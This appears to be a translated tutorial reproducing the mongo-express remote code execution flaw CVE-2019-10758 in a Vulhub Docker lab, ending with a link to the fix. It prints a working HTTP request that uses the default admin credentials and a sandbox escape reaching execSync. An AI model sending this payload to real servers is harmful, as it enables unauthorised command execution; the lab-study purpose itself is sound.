
How to perform MongoDB mongo-express remote code execution

2025-01-17 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article explains in detail how the MongoDB mongo-express remote code execution vulnerability is reproduced. The editor shares it for your reference, and hopes you will have some understanding of the relevant knowledge after reading it.

Brief introduction of the vulnerability:

Affected versions of this package are vulnerable to remote code execution (RCE) through endpoints that use the toBSON method. The vm dependency can be abused to run exec commands in an insecure environment. The default username is admin and the password is pass.

Threat type

Remote code execution

Threat level

High

Vulnerability number

CVE-2019-10758

Affected system and application version

Mongo-express, versions earlier than 0.54.0

Unaffected version

Mongo-express 0.54.0 or later

Reproduction of the vulnerability:

Vulhub already provides an environment for this vulnerability, so we build the vulhub environment.

Vulhub download

git clone https://github.com.cnpmjs.org/vulhub/vulhub

There is also a small bonus. Do you find git clone very slow, downloading at only a few KB/s or a dozen KB/s?

To solve this problem, many methods have been tried, and the most effective one is summarised here.

When running git clone, replace https://github.com with https://github.com.cnpmjs.org/.

This is a domestic GitHub mirror site; as for the download speed... I don't know, it takes off!

Install docker (I installed it before)

Install docker-compose

pip install docker-compose

Enable docker, pull the image, and start the environment

PS: time for another bonus. Do you find docker pull slow? Then use a backer as big as Ali.

https://cr.console.aliyun.com/#/accelerator

Log in to Aliyun; there is a Docker image accelerator in the lower left corner. Follow the steps, and then... take off!

All of these were discovered by falling into one pit after another.

So far, the environment has been successfully built!

After the environment starts, visit http://192.168.192.128:8081 to view the Web page.

Attack reproduction:

Code can be executed by sending the following request directly:

POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

PoC goal: create a file named success under /tmp

Access http://localhost:8081 after sending the request.

Check whether the file was created successfully:

docker-compose exec web ls /tmp

The success file has been created, which brings the reproduction to this stage.

PS: this article is for learning and exchange only.

Repair suggestion:

https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2

Version 0.54.0 removes the vm dependency from bson.js and uses mongo-query-parser instead.

That concludes how to reproduce the MongoDB mongo-express remote code execution vulnerability. I hope the above content is of some help to you and that you can learn more from it. If you think the article is good, share it so more people can see it.


© 2024 shulou.com SLNews company. All rights reserved.
